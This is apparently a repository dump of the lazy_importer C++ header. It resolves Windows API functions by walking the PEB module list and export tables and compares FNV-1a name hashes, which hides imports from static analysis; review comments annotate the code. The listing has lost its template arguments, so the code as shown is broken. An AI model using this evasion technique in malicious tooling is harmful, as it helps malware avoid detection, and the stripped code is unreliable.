208 | unsigned short MajorOperatingSystemVersion;
209 | unsigned short MinorOperatingSystemVersion;
210 | unsigned short MajorImageVersion;
211 | unsigned short MinorImageVersion;
212 | unsigned short MajorSubsystemVersion;
213 | unsigned short MinorSubsystemVersion;
214 | unsigned long Win32VersionValue;
215 | unsigned long SizeOfImage;
216 | unsigned long SizeOfHeaders;
217 | unsigned long CheckSum;
218 | unsigned short Subsystem;
219 | unsigned short DllCharacteristics;
220 | unsigned long SizeOfStackReserve;
221 | unsigned long SizeOfStackCommit;
222 | unsigned long SizeOfHeapReserve;
223 | unsigned long SizeOfHeapCommit;
224 | unsigned long LoaderFlags;
225 | unsigned long NumberOfRvaAndSizes;
226 | IMAGE_DATA_DIRECTORY DataDirectory[16];
227 | };
228 |
229 | struct IMAGE_NT_HEADERS {
230 | unsigned long Signature;
231 | IMAGE_FILE_HEADER FileHeader;
232 | #ifdef _WIN64
233 | IMAGE_OPTIONAL_HEADER64 OptionalHeader;
234 | #else
235 | IMAGE_OPTIONAL_HEADER32 OptionalHeader;
236 | #endif
237 | };
238 |
239 | } // namespace win
240 |
241 | // hashing stuff: 32-bit FNV-1a (offset basis 2166136261, prime 16777619)
242 | struct hash_t {
243 | using value_type = unsigned long;
244 | constexpr static value_type offset = 2166136261; // initial hash value
245 | constexpr static value_type prime = 16777619; // multiplier applied after each character
246 | constexpr static unsigned long long prime64 = prime;
247 |
248 | LAZY_IMPORTER_FORCEINLINE constexpr static value_type single(value_type value,
249 | char c) noexcept // one hashing step: XOR the character (lower-cased when LAZY_IMPORTER_CASE_INSENSITIVE is defined) into value, then multiply by prime
250 | {
251 | return static_cast( // NOTE: the template arguments of both static_cast expressions are missing from this listing
252 | (value ^ LAZY_IMPORTER_TOLOWER(c)) *
253 | static_cast(prime));
254 | }
255 | };
256 |
257 | template
258 | LAZY_IMPORTER_FORCEINLINE constexpr hash_t::value_type
259 | khash(const CharT* str, hash_t::value_type value = hash_t::offset) noexcept // constexpr recursive hash of a NUL-terminated string; LI_FN, LI_FN_DEF and LI_MODULE pass its result as a template argument, so only the hash value, not the name, is compared at run time
260 | {
261 | return (*str ? khash(str + 1, hash_t::single(value, *str)) : value); // fold the current character in, then recurse on the rest; the accumulated value is returned at the terminator
262 | }
263 |
264 | template
265 | LAZY_IMPORTER_FORCEINLINE hash_t::value_type hash(const CharT* str) noexcept
266 | {
267 | hash_t::value_type value = hash_t::offset;
268 |
269 | for(;;) {
270 | char c = *str++;
271 | if(!c)
272 | return value;
273 | value = hash_t::single(value, c);
274 | }
275 | }
276 |
277 | LAZY_IMPORTER_FORCEINLINE hash_t::value_type hash(
278 | const win::UNICODE_STRING_T& str) noexcept
279 | {
280 | auto first = str.Buffer;
281 | const auto last = first + (str.Length / sizeof(wchar_t));
282 | auto value = hash_t::offset;
283 | for(; first != last; ++first)
284 | value = hash_t::single(value, static_cast(*first));
285 |
286 | return value;
287 | }
288 |
289 | LAZY_IMPORTER_FORCEINLINE pair hash_forwarded(
290 | const char* str) noexcept // splits a "module.function" forwarder string at the first '.' and hashes each half; returns {module hash, function hash}
291 | {
292 | pair module_and_function{
293 | hash_t::offset, hash_t::offset
294 | };
295 |
296 | for(; *str != '.'; ++str) // no NUL check here: a string without '.' is read past its end
297 | module_and_function.first = hash_t::single(module_and_function.first, *str);
298 |
299 | ++str; // skip the '.' separator
300 |
301 | for(; *str; ++str)
302 | module_and_function.second = hash_t::single(module_and_function.second, *str);
303 |
304 | return module_and_function;
305 | }
306 |
307 |
308 | // some helper functions
309 | LAZY_IMPORTER_FORCEINLINE const win::PEB_T* peb() noexcept // returns the PEB pointer read straight from a per-thread register-relative slot, without calling any API
310 | {
311 | #if defined(_M_X64) || defined(__amd64__)
312 | return reinterpret_cast(__readgsqword(0x60)); // x64: gs:[0x60]
313 | #elif defined(_M_IX86) || defined(__i386__)
314 | return reinterpret_cast(__readfsdword(0x30)); // x86: fs:[0x30]
315 | #elif defined(_M_ARM) || defined(__arm__)
316 | return *reinterpret_cast(_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30);
317 | #elif defined(_M_ARM64) || defined(__aarch64__)
318 | return *reinterpret_cast(__getReg(18) + 0x60);
319 | #elif defined(_M_IA64) || defined(__ia64__)
320 | return *reinterpret_cast(static_cast(_rdteb()) + 0x60);
321 | #else
322 | #error Unsupported platform. Open an issue and I'll probably add support.
323 | #endif
324 | }
325 |
326 | LAZY_IMPORTER_FORCEINLINE const win::PEB_LDR_DATA_T* ldr()
327 | {
328 | return reinterpret_cast(peb()->Ldr);
329 | }
330 |
331 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_NT_HEADERS* nt_headers(
332 | const char* base) noexcept
333 | {
334 | return reinterpret_cast(
335 | base + reinterpret_cast(base)->e_lfanew);
336 | }
337 |
338 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* image_export_dir(
339 | const char* base) noexcept
340 | {
341 | return reinterpret_cast(
342 | base + nt_headers(base)->OptionalHeader.DataDirectory->VirtualAddress);
343 | }
344 |
345 | LAZY_IMPORTER_FORCEINLINE const win::LDR_DATA_TABLE_ENTRY_T* ldr_data_entry() noexcept
346 | {
347 | return reinterpret_cast(
348 | ldr()->InLoadOrderModuleList.Flink);
349 | }
350 |
351 | struct exports_directory { // read-only view of a loaded module's PE export directory, addressed relative to the module base
352 | const char* _base; // module base address
353 | const win::IMAGE_EXPORT_DIRECTORY* _ied; // export directory inside the mapped image
354 | unsigned long _ied_size; // size of the export data directory, used by is_forwarded()
355 |
356 | public:
357 | using size_type = unsigned long;
358 |
359 | LAZY_IMPORTER_FORCEINLINE
360 | exports_directory(const char* base) noexcept : _base(base) // locates the export directory through DataDirectory[0]; no header signature or bounds validation is performed
361 | {
362 | const auto ied_data_dir = nt_headers(base)->OptionalHeader.DataDirectory[0];
363 | _ied = reinterpret_cast(
364 | base + ied_data_dir.VirtualAddress);
365 | _ied_size = ied_data_dir.Size;
366 | }
367 |
368 | LAZY_IMPORTER_FORCEINLINE explicit operator bool() const noexcept // true when _ied differs from _base, i.e. the export directory RVA is non-zero
369 | {
370 | return reinterpret_cast(_ied) != _base;
371 | }
372 |
373 | LAZY_IMPORTER_FORCEINLINE size_type size() const noexcept // number of named exports
374 | {
375 | return _ied->NumberOfNames;
376 | }
377 |
378 | LAZY_IMPORTER_FORCEINLINE const char* base() const noexcept { return _base; }
379 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* ied() const noexcept
380 | {
381 | return _ied;
382 | }
383 |
384 | LAZY_IMPORTER_FORCEINLINE const char* name(size_type index) const noexcept // name string of the index-th named export; index is not range-checked
385 | {
386 | return reinterpret_cast(
387 | _base + reinterpret_cast(
388 | _base + _ied->AddressOfNames)[index]);
389 | }
390 |
391 | LAZY_IMPORTER_FORCEINLINE const char* address(size_type index) const noexcept // address of the index-th named export: name index -> ordinal table -> function RVA table
392 | {
393 | const auto* const rva_table =
394 | reinterpret_cast(_base + _ied->AddressOfFunctions);
395 |
396 | const auto* const ord_table = reinterpret_cast(
397 | _base + _ied->AddressOfNameOrdinals);
398 |
399 | return _base + rva_table[ord_table[index]];
400 | }
401 |
402 | LAZY_IMPORTER_FORCEINLINE bool is_forwarded(
403 | const char* export_address) const noexcept // an export address that falls inside the export directory itself is treated as a forwarder string
404 | {
405 | const auto ui_ied = reinterpret_cast(_ied);
406 | return (export_address > ui_ied && export_address < ui_ied + _ied_size);
407 | }
408 | };
409 |
410 | struct safe_module_enumerator {
411 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T;
412 | value_type* value;
413 | value_type* head;
414 |
415 | LAZY_IMPORTER_FORCEINLINE safe_module_enumerator() noexcept
416 | : safe_module_enumerator(ldr_data_entry())
417 | {}
418 |
419 | LAZY_IMPORTER_FORCEINLINE
420 | safe_module_enumerator(const detail::win::LDR_DATA_TABLE_ENTRY_T* ldr) noexcept
421 | : value(ldr->load_order_next()), head(value)
422 | {}
423 |
424 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept
425 | {
426 | value = head->load_order_next();
427 | }
428 |
429 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept
430 | {
431 | value = value->load_order_next();
432 |
433 | return value != head && value->DllBase;
434 | }
435 | };
436 |
437 | struct unsafe_module_enumerator { // walks the load-order module list with no end-of-list check
438 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T*;
439 | value_type value; // entry currently being visited
440 |
441 | LAZY_IMPORTER_FORCEINLINE unsafe_module_enumerator() noexcept
442 | : value(ldr_data_entry())
443 | {}
444 |
445 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept { value = ldr_data_entry(); }
446 |
447 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept // advances along InLoadOrderLinks.Flink and always returns true, so a caller's do/while loop ends only when it finds a match
448 | {
449 | value = value->load_order_next();
450 | return true;
451 | }
452 | };
453 |
454 | // provides the cached functions which use Derive classes methods
455 | template
456 | class lazy_base {
457 | protected:
458 | // This function is needed because every templated function
459 | // with different args has its own static buffer
460 | LAZY_IMPORTER_FORCEINLINE static void*& _cache() noexcept
461 | {
462 | static void* value = nullptr;
463 | return value;
464 | }
465 |
466 | public:
467 | template
468 | LAZY_IMPORTER_FORCEINLINE static T safe() noexcept
469 | {
470 | return Derived::template get();
471 | }
472 |
473 | template
474 | LAZY_IMPORTER_FORCEINLINE static T cached() noexcept
475 | {
476 | auto& cached = _cache();
477 | if(!cached)
478 | cached = Derived::template get();
479 |
480 | return (T)(cached);
481 | }
482 |
483 | template
484 | LAZY_IMPORTER_FORCEINLINE static T safe_cached() noexcept
485 | {
486 | return cached();
487 | }
488 | };
489 |
490 | template
491 | struct lazy_module : lazy_base> {
492 | template
493 | LAZY_IMPORTER_FORCEINLINE static T get() noexcept
494 | {
495 | Enum e;
496 | do {
497 | if(hash(e.value->BaseDllName) == Hash)
498 | return (T)(e.value->DllBase);
499 | } while(e.next());
500 | return {};
501 | }
502 |
503 | template
504 | LAZY_IMPORTER_FORCEINLINE static T in(Ldr ldr) noexcept
505 | {
506 | safe_module_enumerator e((const detail::win::LDR_DATA_TABLE_ENTRY_T*)(ldr));
507 | do {
508 | if(hash(e.value->BaseDllName) == Hash)
509 | return (T)(e.value->DllBase);
510 | } while(e.next());
511 | return {};
512 | }
513 |
514 | template
515 | LAZY_IMPORTER_FORCEINLINE static T in_cached(Ldr ldr) noexcept
516 | {
517 | auto& cached = lazy_base>::_cache();
518 | if(!cached)
519 | cached = in(ldr);
520 |
521 | return (T)(cached);
522 | }
523 | };
524 |
525 | template
526 | struct lazy_function : lazy_base, T> {
527 | using base_type = lazy_base, T>;
528 |
529 | template
530 | LAZY_IMPORTER_FORCEINLINE decltype(auto) operator()(Args&&... args) const // resolves the function and calls it with the forwarded arguments; the resolved pointer is not checked for null before the call
531 | {
532 | #ifndef LAZY_IMPORTER_CACHE_OPERATOR_PARENS
533 | return get()(std::forward(args)...); // default: a fresh lookup on every call
534 | #else
535 | return this->cached()(std::forward(args)...); // opt-in: reuse the pointer stored by lazy_base::cached()
536 | #endif
537 | }
538 |
539 | template
540 | LAZY_IMPORTER_FORCEINLINE static F get() noexcept // resolves the export whose name hash equals Hash by reading the loaded-module list and each module's export table directly; only hashes are compared, never an API name string
541 | {
542 | // for backwards compatibility.
543 | // Before 2.0 it was only possible to resolve forwarded exports when
544 | // this macro was enabled
545 | #ifdef LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS
546 | return forwarded();
547 | #else
548 |
549 | Enum e; // module enumerator type comes from a template parameter that is missing from this listing
550 |
551 | do {
552 | #ifdef LAZY_IMPORTER_HARDENED_MODULE_CHECKS
553 | if(!e.value->DllBase || !e.value->FullDllName.Length) // skip entries with no base address or an empty name
554 | continue;
555 | #endif
556 |
557 | const exports_directory exports(e.value->DllBase);
558 |
559 | if(exports) {
560 | auto export_index = exports.size();
561 | while(export_index--) // scan the named exports from last to first
562 | if(hash(exports.name(export_index)) == Hash)
563 | return (F)(exports.address(export_index));
564 | }
565 | } while(e.next());
566 | return {}; // no match: a value-initialized (null) F, reached only if the enumerator's next() returns false
567 | #endif
568 | }
569 |
570 | template
571 | LAZY_IMPORTER_FORCEINLINE static F forwarded() noexcept
572 | {
573 | detail::win::UNICODE_STRING_T name;
574 | hash_t::value_type module_hash = 0;
575 | auto function_hash = Hash;
576 |
577 | Enum e;
578 | do {
579 | name = e.value->BaseDllName;
580 | name.Length -= 8; // get rid of .dll extension
581 |
582 | if(!module_hash || hash(name) == module_hash) {
583 | const exports_directory exports(e.value->DllBase);
584 |
585 | if(exports) {
586 | auto export_index = exports.size();
587 | while(export_index--)
588 | if(hash(exports.name(export_index)) == function_hash) {
589 | const auto addr = exports.address(export_index);
590 |
591 | if(exports.is_forwarded(addr)) {
592 | auto hashes = hash_forwarded(
593 | reinterpret_cast(addr));
594 |
595 | function_hash = hashes.second;
596 | module_hash = hashes.first;
597 |
598 | e.reset();
599 | break;
600 | }
601 | return (F)(addr);
602 | }
603 | }
604 | }
605 | } while(e.next());
606 | return {};
607 | }
608 |
609 | template
610 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe() noexcept
611 | {
612 | return forwarded();
613 | }
614 |
615 | template
616 | LAZY_IMPORTER_FORCEINLINE static F forwarded_cached() noexcept
617 | {
618 | auto& value = base_type::_cache();
619 | if(!value)
620 | value = forwarded();
621 | return (F)(value);
622 | }
623 |
624 | template
625 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe_cached() noexcept
626 | {
627 | return forwarded_cached();
628 | }
629 |
630 | template
631 | LAZY_IMPORTER_FORCEINLINE static F in(Module m) noexcept
632 | {
633 | if(IsSafe && !m)
634 | return {};
635 |
636 | const exports_directory exports((const char*)(m));
637 | if(IsSafe && !exports)
638 | return {};
639 |
640 | for(unsigned long i{};; ++i) {
641 | if(IsSafe && i == exports.size())
642 | break;
643 |
644 | if(hash(exports.name(i)) == Hash)
645 | return (F)(exports.address(i));
646 | }
647 | return {};
648 | }
649 |
650 | template
651 | LAZY_IMPORTER_FORCEINLINE static F in_safe(Module m) noexcept
652 | {
653 | return in(m);
654 | }
655 |
656 | template
657 | LAZY_IMPORTER_FORCEINLINE static F in_cached(Module m) noexcept
658 | {
659 | auto& value = base_type::_cache();
660 | if(!value)
661 | value = in(m);
662 | return (F)(value);
663 | }
664 |
665 | template
666 | LAZY_IMPORTER_FORCEINLINE static F in_safe_cached(Module m) noexcept
667 | {
668 | return in_cached(m);
669 | }
670 |
671 | template
672 | LAZY_IMPORTER_FORCEINLINE static F nt() noexcept
673 | {
674 | return in(ldr_data_entry()->load_order_next()->DllBase);
675 | }
676 |
677 | template
678 | LAZY_IMPORTER_FORCEINLINE static F nt_safe() noexcept
679 | {
680 | return in_safe(ldr_data_entry()->load_order_next()->DllBase);
681 | }
682 |
683 | template
684 | LAZY_IMPORTER_FORCEINLINE static F nt_cached() noexcept
685 | {
686 | return in_cached(ldr_data_entry()->load_order_next()->DllBase);
687 | }
688 |
689 | template
690 | LAZY_IMPORTER_FORCEINLINE static F nt_safe_cached() noexcept
691 | {
692 | return in_safe_cached(ldr_data_entry()->load_order_next()->DllBase);
693 | }
694 | };
695 |
696 | }} // namespace li::detail
697 |
698 | #endif // include guard
699 |
--------------------------------------------------------------------------------
/aes加密/lazy_importer.hpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2018-2020 Justas Masiulis
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | // documentation is available at https://github.com/JustasMasiulis/lazy_importer
18 |
19 | #ifndef LAZY_IMPORTER_HPP
20 | #define LAZY_IMPORTER_HPP
21 |
22 | #define LI_FN(name) \
23 | ::li::detail::lazy_function<::li::detail::khash(#name), decltype(&name)>()
24 |
25 | #define LI_FN_DEF(name) ::li::detail::lazy_function<::li::detail::khash(#name), name>()
26 |
27 | #define LI_MODULE(name) ::li::detail::lazy_module<::li::detail::khash(name)>()
28 |
29 | // NOTE only std::forward is used from this header.
30 | // If there is a need to eliminate this dependency the function itself is very small.
31 |
32 | #include
33 | #include
34 | #include
35 |
36 | #ifndef LAZY_IMPORTER_NO_FORCEINLINE
37 | #if defined(_MSC_VER)
38 | #define LAZY_IMPORTER_FORCEINLINE __forceinline
39 | #elif defined(__GNUC__) && __GNUC__ > 3
40 | #define LAZY_IMPORTER_FORCEINLINE inline __attribute__((__always_inline__))
41 | #else
42 | #define LAZY_IMPORTER_FORCEINLINE inline
43 | #endif
44 | #else
45 | #define LAZY_IMPORTER_FORCEINLINE inline
46 | #endif
47 |
48 | #ifdef LAZY_IMPORTER_CASE_INSENSITIVE
49 | #define LAZY_IMPORTER_TOLOWER(c) (c >= 'A' && c <= 'Z' ? (c | (1 << 5)) : c)
50 | #else
51 | #define LAZY_IMPORTER_TOLOWER(c) (c)
52 | #endif
53 |
54 | namespace li {
55 | namespace detail {
56 |
57 | template
58 | struct pair {
59 | First first;
60 | Second second;
61 | };
62 |
63 | namespace win {
64 |
65 | struct LIST_ENTRY_T {
66 | const char* Flink;
67 | const char* Blink;
68 | };
69 |
70 | struct UNICODE_STRING_T {
71 | unsigned short Length;
72 | unsigned short MaximumLength;
73 | wchar_t* Buffer;
74 | };
75 |
76 | struct PEB_LDR_DATA_T {
77 | unsigned long Length;
78 | unsigned long Initialized;
79 | const char* SsHandle;
80 | LIST_ENTRY_T InLoadOrderModuleList;
81 | };
82 |
83 | struct PEB_T {
84 | unsigned char Reserved1[2];
85 | unsigned char BeingDebugged;
86 | unsigned char Reserved2[1];
87 | const char* Reserved3[2];
88 | PEB_LDR_DATA_T* Ldr;
89 | };
90 |
91 | struct LDR_DATA_TABLE_ENTRY_T {
92 | LIST_ENTRY_T InLoadOrderLinks;
93 | LIST_ENTRY_T InMemoryOrderLinks;
94 | LIST_ENTRY_T InInitializationOrderLinks;
95 | const char* DllBase;
96 | const char* EntryPoint;
97 | union {
98 | unsigned long SizeOfImage;
99 | const char* _dummy;
100 | };
101 | UNICODE_STRING_T FullDllName;
102 | UNICODE_STRING_T BaseDllName;
103 |
104 | LAZY_IMPORTER_FORCEINLINE const LDR_DATA_TABLE_ENTRY_T*
105 | load_order_next() const noexcept
106 | {
107 | return reinterpret_cast(
108 | InLoadOrderLinks.Flink);
109 | }
110 | };
111 |
112 | struct IMAGE_DOS_HEADER { // DOS .EXE header
113 | unsigned short e_magic; // Magic number
114 | unsigned short e_cblp; // Bytes on last page of file
115 | unsigned short e_cp; // Pages in file
116 | unsigned short e_crlc; // Relocations
117 | unsigned short e_cparhdr; // Size of header in paragraphs
118 | unsigned short e_minalloc; // Minimum extra paragraphs needed
119 | unsigned short e_maxalloc; // Maximum extra paragraphs needed
120 | unsigned short e_ss; // Initial (relative) SS value
121 | unsigned short e_sp; // Initial SP value
122 | unsigned short e_csum; // Checksum
123 | unsigned short e_ip; // Initial IP value
124 | unsigned short e_cs; // Initial (relative) CS value
125 | unsigned short e_lfarlc; // File address of relocation table
126 | unsigned short e_ovno; // Overlay number
127 | unsigned short e_res[4]; // Reserved words
128 | unsigned short e_oemid; // OEM identifier (for e_oeminfo)
129 | unsigned short e_oeminfo; // OEM information; e_oemid specific
130 | unsigned short e_res2[10]; // Reserved words
131 | long e_lfanew; // File address of new exe header
132 | };
133 |
134 | struct IMAGE_FILE_HEADER {
135 | unsigned short Machine;
136 | unsigned short NumberOfSections;
137 | unsigned long TimeDateStamp;
138 | unsigned long PointerToSymbolTable;
139 | unsigned long NumberOfSymbols;
140 | unsigned short SizeOfOptionalHeader;
141 | unsigned short Characteristics;
142 | };
143 |
144 | struct IMAGE_EXPORT_DIRECTORY {
145 | unsigned long Characteristics;
146 | unsigned long TimeDateStamp;
147 | unsigned short MajorVersion;
148 | unsigned short MinorVersion;
149 | unsigned long Name;
150 | unsigned long Base;
151 | unsigned long NumberOfFunctions;
152 | unsigned long NumberOfNames;
153 | unsigned long AddressOfFunctions; // RVA from base of image
154 | unsigned long AddressOfNames; // RVA from base of image
155 | unsigned long AddressOfNameOrdinals; // RVA from base of image
156 | };
157 |
158 | struct IMAGE_DATA_DIRECTORY {
159 | unsigned long VirtualAddress;
160 | unsigned long Size;
161 | };
162 |
163 | struct IMAGE_OPTIONAL_HEADER64 { // local mirror of the PE32+ optional header; selected when _WIN64 is defined
164 | unsigned short Magic;
165 | unsigned char MajorLinkerVersion;
166 | unsigned char MinorLinkerVersion;
167 | unsigned long SizeOfCode;
168 | unsigned long SizeOfInitializedData;
169 | unsigned long SizeOfUninitializedData;
170 | unsigned long AddressOfEntryPoint;
171 | unsigned long BaseOfCode;
172 | unsigned long long ImageBase; // 64-bit here; the 32-bit layout has a 32-bit ImageBase preceded by BaseOfData
173 | unsigned long SectionAlignment;
174 | unsigned long FileAlignment;
175 | unsigned short MajorOperatingSystemVersion;
176 | unsigned short MinorOperatingSystemVersion;
177 | unsigned short MajorImageVersion;
178 | unsigned short MinorImageVersion;
179 | unsigned short MajorSubsystemVersion;
180 | unsigned short MinorSubsystemVersion;
181 | unsigned long Win32VersionValue;
182 | unsigned long SizeOfImage; // not consulted by the visible code, so RVAs are never range-checked against it
183 | unsigned long SizeOfHeaders;
184 | unsigned long CheckSum;
185 | unsigned short Subsystem;
186 | unsigned short DllCharacteristics;
187 | unsigned long long SizeOfStackReserve;
188 | unsigned long long SizeOfStackCommit;
189 | unsigned long long SizeOfHeapReserve;
190 | unsigned long long SizeOfHeapCommit;
191 | unsigned long LoaderFlags;
192 | unsigned long NumberOfRvaAndSizes; // not consulted before DataDirectory[0] is read further down
193 | IMAGE_DATA_DIRECTORY DataDirectory[16]; // entry 0 is the one this file reads as the export directory
194 | };
195 |
196 | struct IMAGE_OPTIONAL_HEADER32 { // local mirror of the PE32 optional header; selected when _WIN64 is not defined
197 | unsigned short Magic;
198 | unsigned char MajorLinkerVersion;
199 | unsigned char MinorLinkerVersion;
200 | unsigned long SizeOfCode;
201 | unsigned long SizeOfInitializedData;
202 | unsigned long SizeOfUninitializedData;
203 | unsigned long AddressOfEntryPoint;
204 | unsigned long BaseOfCode;
205 | unsigned long BaseOfData; // present only in this 32-bit layout
206 | unsigned long ImageBase; // 32-bit here, 64-bit in IMAGE_OPTIONAL_HEADER64
207 | unsigned long SectionAlignment;
208 | unsigned long FileAlignment;
209 | unsigned short MajorOperatingSystemVersion;
210 | unsigned short MinorOperatingSystemVersion;
211 | unsigned short MajorImageVersion;
212 | unsigned short MinorImageVersion;
213 | unsigned short MajorSubsystemVersion;
214 | unsigned short MinorSubsystemVersion;
215 | unsigned long Win32VersionValue;
216 | unsigned long SizeOfImage; // not consulted by the visible code, so RVAs are never range-checked against it
217 | unsigned long SizeOfHeaders;
218 | unsigned long CheckSum;
219 | unsigned short Subsystem;
220 | unsigned short DllCharacteristics;
221 | unsigned long SizeOfStackReserve; // stack/heap sizes are 32-bit here, 64-bit in the PE32+ layout
222 | unsigned long SizeOfStackCommit;
223 | unsigned long SizeOfHeapReserve;
224 | unsigned long SizeOfHeapCommit;
225 | unsigned long LoaderFlags;
226 | unsigned long NumberOfRvaAndSizes; // not consulted before DataDirectory[0] is read further down
227 | IMAGE_DATA_DIRECTORY DataDirectory[16]; // entry 0 is the one this file reads as the export directory
228 | };
229 |
230 | struct IMAGE_NT_HEADERS { // header block that nt_headers() locates at base + e_lfanew
231 | unsigned long Signature; // never compared against an expected value in the visible code
232 | IMAGE_FILE_HEADER FileHeader;
233 | #ifdef _WIN64
234 | IMAGE_OPTIONAL_HEADER64 OptionalHeader; // layout follows the build target, not the Magic of the module being parsed
235 | #else
236 | IMAGE_OPTIONAL_HEADER32 OptionalHeader;
237 | #endif
238 | };
239 |
240 | } // namespace win
241 |
242 | // Hashing helpers: module and export names are matched by a 32-bit hash rather than by string comparison.
243 | struct hash_t {
244 | using value_type = unsigned long;
245 | constexpr static value_type offset = 2166136261; // 32-bit FNV offset basis (0x811C9DC5)
246 | constexpr static value_type prime = 16777619; // 32-bit FNV prime (0x01000193)
247 | constexpr static unsigned long long prime64 = prime;
248 |
249 | LAZY_IMPORTER_FORCEINLINE constexpr static value_type single(value_type value,
250 | char c) noexcept
251 | { // one FNV-1a style step: XOR the character into the running value, then multiply by the prime
252 | return static_cast( // NOTE(review): the <...> arguments of both casts are missing from this listing
253 | (value ^ LAZY_IMPORTER_TOLOWER(c)) * // macro is defined outside this excerpt; by its name it lower-cases c — confirm
254 | static_cast(prime));
255 | }
256 | };
257 |
258 | template // NOTE(review): the template parameter list (it must declare CharT) is missing from this listing
259 | LAZY_IMPORTER_FORCEINLINE constexpr hash_t::value_type
260 | khash(const CharT* str, hash_t::value_type value = hash_t::offset) noexcept
261 | { // constexpr, recursive form of the hash: folds one character per call and stops at the terminating NUL
262 | return (*str ? khash(str + 1, hash_t::single(value, *str)) : value);
263 | }
264 |
265 | template // NOTE(review): the template parameter list (it must declare CharT) is missing from this listing
266 | LAZY_IMPORTER_FORCEINLINE hash_t::value_type hash(const CharT* str) noexcept
267 | { // run-time counterpart of khash(): the same fold over a NUL-terminated string, written as a loop
268 | hash_t::value_type value = hash_t::offset;
269 |
270 | for (;;) {
271 | char c = *str++; // CharT is narrowed to char before the terminator test and before hashing
272 | if (!c) // the only exit: str must be NUL-terminated, no length bound is applied
273 | return value;
274 | value = hash_t::single(value, c);
275 | }
276 | }
277 |
278 | LAZY_IMPORTER_FORCEINLINE hash_t::value_type hash(
279 | const win::UNICODE_STRING_T& str) noexcept
280 | { // hashes a counted wide string (used on loader entries' BaseDllName) without needing a terminator
281 | auto first = str.Buffer;
282 | const auto last = first + (str.Length / sizeof(wchar_t)); // Length is treated as a byte count
283 | auto value = hash_t::offset;
284 | for (; first != last; ++first)
285 | value = hash_t::single(value, static_cast(*first)); // single() takes a char, so each wide character is narrowed
286 |
287 | return value;
288 | }
289 |
290 | LAZY_IMPORTER_FORCEINLINE pair hash_forwarded(
291 | const char* str) noexcept
292 | { // splits a "module.function" forwarder string at the first '.' and hashes each half separately
293 | pair module_and_function{
294 | hash_t::offset, hash_t::offset
295 | };
296 |
297 | for (; *str != '.'; ++str) // NOTE(review): no NUL check here — a string without '.' is read past its end
298 | module_and_function.first = hash_t::single(module_and_function.first, *str);
299 |
300 | ++str; // step over the '.' separator
301 |
302 | for (; *str; ++str) // remainder up to the NUL is the function part
303 | module_and_function.second = hash_t::single(module_and_function.second, *str);
304 |
305 | return module_and_function; // first = module-name hash, second = function-name hash
306 | }
307 |
308 |
309 | // some helper functions
310 | LAZY_IMPORTER_FORCEINLINE const win::PEB_T* peb() noexcept
311 | { // returns the calling process's PEB pointer, read with a per-architecture intrinsic instead of an API call
312 | #if defined(_M_X64) || defined(__amd64__)
313 | return reinterpret_cast(__readgsqword(0x60)); // x64: qword at GS:[0x60]
314 | #elif defined(_M_IX86) || defined(__i386__)
315 | return reinterpret_cast(__readfsdword(0x30)); // x86: dword at FS:[0x30]
316 | #elif defined(_M_ARM) || defined(__arm__)
317 | return *reinterpret_cast(_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30);
318 | #elif defined(_M_ARM64) || defined(__aarch64__)
319 | return *reinterpret_cast(__getReg(18) + 0x60);
320 | #elif defined(_M_IA64) || defined(__ia64__)
321 | return *reinterpret_cast(static_cast(_rdteb()) + 0x60);
322 | #else
323 | #error Unsupported platform. Open an issue and I'll probably add support.
324 | #endif
325 | }
326 |
327 | LAZY_IMPORTER_FORCEINLINE const win::PEB_LDR_DATA_T* ldr()
328 | { // returns the PEB's Ldr member reinterpreted as this file's PEB_LDR_DATA_T; unlike its neighbours, not marked noexcept
329 | return reinterpret_cast(peb()->Ldr);
330 | }
331 |
332 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_NT_HEADERS* nt_headers(
333 | const char* base) noexcept
334 | { // locates the NT headers of the module mapped at base by following the DOS header's e_lfanew offset
335 | return reinterpret_cast(
336 | base + reinterpret_cast(base)->e_lfanew); // e_lfanew is trusted as-is: no magic, signature or range check is made here
337 | }
338 |
339 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* image_export_dir(
340 | const char* base) noexcept
341 | { // returns base plus the RVA of data-directory entry 0; equals base itself when that RVA is 0
342 | return reinterpret_cast(
343 | base + nt_headers(base)->OptionalHeader.DataDirectory->VirtualAddress); // array decays to a pointer, so this reads entry 0
344 | }
345 |
346 | LAZY_IMPORTER_FORCEINLINE const win::LDR_DATA_TABLE_ENTRY_T* ldr_data_entry() noexcept
347 | { // returns the first link of the loader's load-order module list, viewed as a module table entry
348 | return reinterpret_cast(
349 | ldr()->InLoadOrderModuleList.Flink); // the list is read without any lock being taken in the visible code
350 | }
351 |
352 | struct exports_directory { // read-only view over the export directory of a module mapped at _base
353 | const char* _base; // module base; every RVA below is added to it
354 | const win::IMAGE_EXPORT_DIRECTORY* _ied; // base + RVA of data-directory entry 0
355 | unsigned long _ied_size; // Size of data-directory entry 0, in bytes
356 |
357 | public:
358 | using size_type = unsigned long;
359 |
360 | LAZY_IMPORTER_FORCEINLINE
361 | exports_directory(const char* base) noexcept : _base(base)
362 | { // base is dereferenced immediately; callers must pass a mapped module base
363 | const auto ied_data_dir = nt_headers(base)->OptionalHeader.DataDirectory[0];
364 | _ied = reinterpret_cast(
365 | base + ied_data_dir.VirtualAddress);
